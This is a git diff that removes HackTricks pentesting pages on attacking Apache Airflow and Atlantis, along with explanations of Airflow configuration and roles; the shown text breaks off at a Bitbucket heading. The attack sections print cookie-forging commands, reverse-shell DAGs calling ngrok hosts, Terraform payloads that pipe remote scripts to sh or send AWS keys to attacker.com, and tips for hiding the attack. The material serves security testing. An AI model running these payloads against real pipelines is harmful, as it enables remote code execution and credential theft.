hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Basic Information - -[**Apache Airflow**](https://airflow.apache.org) is used for the **scheduling and **_**orchestration of data pipelines**_** or workflows**. Orchestration of data pipelines refers to the sequencing, coordination, scheduling, and managing complex **data pipelines from diverse sources**. These data pipelines deliver data sets that are ready for consumption either by business intelligence applications and data science, machine learning models that support big data applications. - -Basically, Apache Airflow will allow you to **schedule de execution of code when something** (event, cron) **happens**. - -# Local Lab - -## Docker-Compose - -You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM). 
- -## Minikube - -One easy way to **run apache airflo**w is to run it **with minikube**: - -```bash -helm repo add airflow-stable https://airflow-helm.github.io/charts -helm repo update -helm install airflow-release airflow-stable/airflow -# Some information about how to aceess the web console will appear after this command - -# Use this command to delete it -helm delete airflow-release -``` - -# Airflow Configuration - -Airflow might store **sensitive information** in its configuration or you can find weak configurations in place: - -{% content-ref url="airflow-configuration.md" %} -[airflow-configuration.md](airflow-configuration.md) -{% endcontent-ref %} - -# Airflow RBAC - -Before start attacking Airflow you should understand **how permissions work**: - -{% content-ref url="airflow-rbac.md" %} -[airflow-rbac.md](airflow-rbac.md) -{% endcontent-ref %} - -# Attacks - -## Web Console Enumeration - -If you have **access to the web console** you might be able to access some or all of the following information: - -* **Variables** (Custom sensitive information might be stored here) -* **Connections** (Custom sensitive information might be stored here) -* [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here) -* List **users & roles** -* **Code of each DAG** (which might contain interesting info) - -## Privilege Escalation - -If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**. 
- -```bash -flask-unsign --sign --secret '' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}" -``` - -## DAG Backdoor (RCE in Airflow worker) - -If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\ -Note that this reverse shell is going to be executed inside an **airflow worker container**: - -```python -import pendulum -from airflow import DAG -from airflow.operators.bash import BashOperator - -with DAG( - dag_id='rev_shell_bash', - schedule_interval='0 0 * * *', - start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), -) as dag: - run = BashOperator( - task_id='run', - bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1', - ) -``` - -```python -import pendulum, socket, os, pty -from airflow import DAG -from airflow.operators.python import PythonOperator - -def rs(rhost, port): - s = socket.socket() - s.connect((rhost, port)) - [os.dup2(s.fileno(),fd) for fd in (0,1,2)] - pty.spawn("/bin/sh") - -with DAG( - dag_id='rev_shell_python', - schedule_interval='0 0 * * *', - start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), -) as dag: - run = PythonOperator( - task_id='rs_python', - python_callable=rs, - op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433} - ) -``` - -## DAG Backdoor (RCE in Airflow scheduler) - -If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder. 
- -```python -import pendulum, socket, os, pty -from airflow import DAG -from airflow.operators.python import PythonOperator - -def rs(rhost, port): - s = socket.socket() - s.connect((rhost, port)) - [os.dup2(s.fileno(),fd) for fd in (0,1,2)] - pty.spawn("/bin/sh") - -rs("2.tcp.ngrok.io", 14403) - -with DAG( - dag_id='rev_shell_python2', - schedule_interval='0 0 * * *', - start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), -) as dag: - run = PythonOperator( - task_id='rs_python2', - python_callable=rs, - op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144} -``` - -## DAG Creation - -If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster. - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/apache-airflow/airflow-configuration.md b/cloud-security/apache-airflow/airflow-configuration.md deleted file mode 100644 index ae4e65f9e..000000000 --- a/cloud-security/apache-airflow/airflow-configuration.md +++ /dev/null @@ -1,143 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Configuration File - -**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.** - -**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.** - -Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`. - -If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\ -If you have **access to some machine inside the airflow env**, check the **environment**. - -Some interesting values to check when reading the config file: - -## \[api] - -* **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS** -* **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS** -* **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS** -* **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API: - * `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API - * `airflow.api.auth.backend.default`: **Everyone can** access it without authentication - * `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication** - * `airflow.api.auth.backend.basic_auth`: For **basic authentication** - * `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)). 
- * `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default). - * You can also **create you own authentication** method with python. -* **`google_key_path`:** Path to the **GCP service account key** - -## **\[atlas]** - -* **`password`**: Atlas password -* **`username`**: Atlas username - -## \[celery] - -* **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_) -* **`result_backend`**: Postgres url which may contain **credentials**. -* **`ssl_cacert`**: Path to the cacert -* **`ssl_cert`**: Path to the cert -* **`ssl_key`**: Path to the key - -## \[core] - -* **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don’t contain the strings `DAG` and `airflow`. -* **`fernet_key`**: Key to store encrypted variables (symmetric) -* **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections. -* **`security`**: What security module to use (for example kerberos) - -## \[dask] - -* **`tls_ca`**: Path to ca -* **`tls_cert`**: Part to the cert -* **`tls_key`**: Part to the tls key - -## \[kerberos] - -* **`ccache`**: Path to ccache file -* **`forwardable`**: Enabled by default - -## \[logging] - -* **`google_key_path`**: Path to GCP JSON creds. - -## \[secrets] - -* **`backend`**: Full class name of secrets backend to enable -* **`backend_kwargs`**: The backend\_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class. 
- -## \[smtp] - -* **`smtp_password`**: SMTP password -* **`smtp_user`**: SMTP user - -## \[webserver] - -* **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value -* **`cookie_secure`**: Set **secure flag** on the session cookie -* **`expose_config`**: By default it's False, if true, the **config** can be **read** from the web **console** -* **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker) -* **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**) -* **`web_server_ssl_cert`**: **Path** to the **SSL** **cert** -* **`web_server_ssl_key`**: **Path** to the **SSL** **Key** -* **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible - -## Web Authentication - -By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as - -```bash -AUTH_TYPE = AUTH_DB -``` - -Which means that the **authentication is checked against the database**. However, other configurations are possible like - -```bash -AUTH_TYPE = AUTH_OAUTH -``` - -To leave the **authentication to third party services**. - -However, there is also an option to **allow anonymous users access**, setting the following parameter to the **desired role**: - -```bash -AUTH_ROLE_PUBLIC = 'Admin' -``` - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/apache-airflow/airflow-rbac.md b/cloud-security/apache-airflow/airflow-rbac.md deleted file mode 100644 index 575288e30..000000000 --- a/cloud-security/apache-airflow/airflow-rbac.md +++ /dev/null @@ -1,75 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# RBAC - -Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles. - -* **`Admin`** users have all possible permissions. -* **`Public`** users (anonymous) don’t have any permissions. -* **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.** -* **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file** -* **`Op`** users have `User` permissions plus additional op permissions. - -Note that **admin** users can **create more roles** with more **granular permissions**. - -Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that. - -## Default Permissions - -These are the default permissions per default role: - -* **Admin** - -\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My 
Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs] - -* **Op** - -\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA 
Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs] - -* **User** - -\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances] - -* **Viewer** - -\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on 
Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances] - -* **Public** - -\[] - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/atlantis.md b/cloud-security/atlantis.md deleted file mode 100644 index c92ece0ad..000000000 --- a/cloud-security/atlantis.md +++ /dev/null @@ -1,394 +0,0 @@ -# Atlantis - -## Atlantis - -
- -Support HackTricks and get benefits! - -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## Basic Information - -Atlantis basically helps you to run terraform from Pull Requests from your git server. - -![](<../.gitbook/assets/image (307) (3).png>) - -## Local Lab - -1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you. -2. Create a **personal token** (with repo access) of your **github** user -3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis** - 1. You can access the web page in 127.0.0.1:4141 - -## Atlantis Access - -### Git Server Credentials - -**Atlantis** supports several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\ -However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\ -[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platforms specifically for Atlantis, but some people might use personal accounts. - -{% hint style="warning" %} -In any case, from an attacker's perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**. -{% endhint %} - -### Webhooks - -Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**. - -One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret. - -Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet. - -{% hint style="warning" %} -Atlantis is going to be **exposing webhooks** so the git server can send it information.
From an attackers perspective it would be interesting to know **if you can send it messages**. -{% endhint %} - -### Provider Credentials - -Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider. - -It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis: - -* The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs. -* If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex: - * [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role") - * [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider\_reference) -* Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running. -* Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running. -* Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials. - -{% hint style="warning" %} -The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform. -{% endhint %} - -### Web Page - -By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful). 
- -You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones). - -## Server Configuration - -Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three. - -* You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server -* You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)\*\*\*\* - -Values are **chosen in this order**: - -1. Flags -2. Environment Variables -3. Config File - -{% hint style="warning" %} -Note that in the configuration you might find interesting values such as **tokens and passwords**. -{% endhint %} - -### Repos Configuration - -Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order: - -1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it. - 1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows` -2. \*\*\*\*[**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported) -3. 
**Default** values - -**PR Protections** - -Atlantis allows you to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be \*\*`mergeable` \*\* (branch protections passed) **before running apply**. From a security point of view, setting both options is recommended. - -In case `allowed_overrides` is True, these settings can be **overwritten on each project by the `/atlantis.yml` file**. - -**Scripts** - -The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) \*\*\*\* (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) \*\*\*\* (_post workflow hooks_) a **workflow is executed.** - -There isn't any option to allow **specifying** these scripts in the \*\*repo `/atlantis.yml` \*\* file. - -**Workflow** - -In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\ -\*\*\*\*Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.** - -{% hint style="danger" %} -If the flag \*\*\*\* `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo.\ -This will basically give **RCE in the Atlantis server to any user that can access that repo**. - -```yaml -# atlantis.yaml -version: 3 -projects: -- dir: . 
- workflow: custom1 -workflows: - custom1: - plan: - steps: - - init - - run: my custom plan command - apply: - steps: - - run: my custom apply command -``` -{% endhint %} - -**Conftest Policy Checking** - -Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev) **policies** against the plan output. Common usecases for using this step include: - -* Denying usage of a list of modules -* Asserting attributes of a resource at creation time -* Catching unintentional resource deletions -* Preventing security risks (ie. exposing secure ports to the public) - -You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works). - -## Atlantis Commands - -\*\*\*\*[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis: - -```bash -# Get help -atlantis help - -# Run terraform plan -atlantis plan [options] -- [terraform plan flags] -#Options: -# -d directory -# -p project -# --verbose -# You can also add extra terraform options - -# Run terraform apply -atlantis apply [options] -- [terraform apply flags] -#Options: -# -d directory -# -p project -# -w workspace -# --auto-merge-disabled -# --verbose -# You can also add extra terraform options -``` - -## Attacks - -{% hint style="warning" %} -If during the exploitation you find this **error**: `Error: Error acquiring the state lock` - -You can fix it by running: - -``` -atlantis unlock #You might need to run this in a different PR -atlantis plan -- -lock=false -``` -{% endhint %} - -### Atlantis plan RCE - Config modification in new PR - -If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can \*\*execute `atlantis plan` \*\* (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**. 
- -You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source). Just put a payload like the following in the `main.tf` file: - -```json -data "external" "example" { - program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] -} -``` - -**Stealthier Attack** - -You can perform this attack even in a **stealthier way**, by following this suggestions: - -* Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: - -```javascript -module "not_rev_shell" { - source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules" -} -``` - -You can find the rev shell code in [https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules](https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules) - -* In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` -* **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**. - -### Atlantis apply RCE - Config modification in new PR - -If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**. - -However, you will usually need to bypass some protections: - -* **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed). 
- * Check potential [**branch protections bypasses**](github-security/#branch-protection-bypass)\*\*\*\* -* **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply` - * By default you can abuse the [**Gitbot token to bypass this protection**](github-security/#github\_token)\*\*\*\* - -Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ -\*\*\*\* You just need to make sure some payload like the following ones ends in the `main.tf` file: - -```json -// Payload 1 to just steal a secret -resource "null_resource" "secret_stealer" { - provisioner "local-exec" { - command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" - } -} - -// Payload 2 to get a rev shell -resource "null_resource" "rev_shell" { - provisioner "local-exec" { - command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'" - } -} -``` - -Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**. - -### Terraform Param Injection - -When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like: - -```bash -atlantis plan -- -atlantis plan -- -h #Get terraform plan help - -atlantis apply -- -atlantis apply -- -h #Get terraform apply help -``` - -Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables) - -### Custom Workflow - -Running **malicious custom build commands** specified in an `atlantis.yaml` file. 
Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of `master`.\ -This possibility was mentioned in a previous section: - -{% hint style="danger" %} -If the flag \*\*\*\* `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo.\ -This will basically give **RCE in the Atlantis server to any user that can access that repo**. - -```yaml -# atlantis.yaml -version: 3 -projects: -- dir: . - workflow: custom1 -workflows: - custom1: - plan: - steps: - - init - - run: my custom plan command - apply: - steps: - - run: my custom apply command -``` -{% endhint %} - -### PR Hijacking - -If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to. - -Moreover, if you don't have configured in the **branch protection** to ask to **reevaluate** every PR when a **new commit is pushed** to it, someone could **write malicious configs** (check previous scenarios) in the terraform config, run `atlantis plan/apply` and gain RCE. - -This is the **setting** in Github branch protections: - -![](<../.gitbook/assets/image (307) (4).png>) - -### Webhook Secret - -If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly. - -### Bitbucket 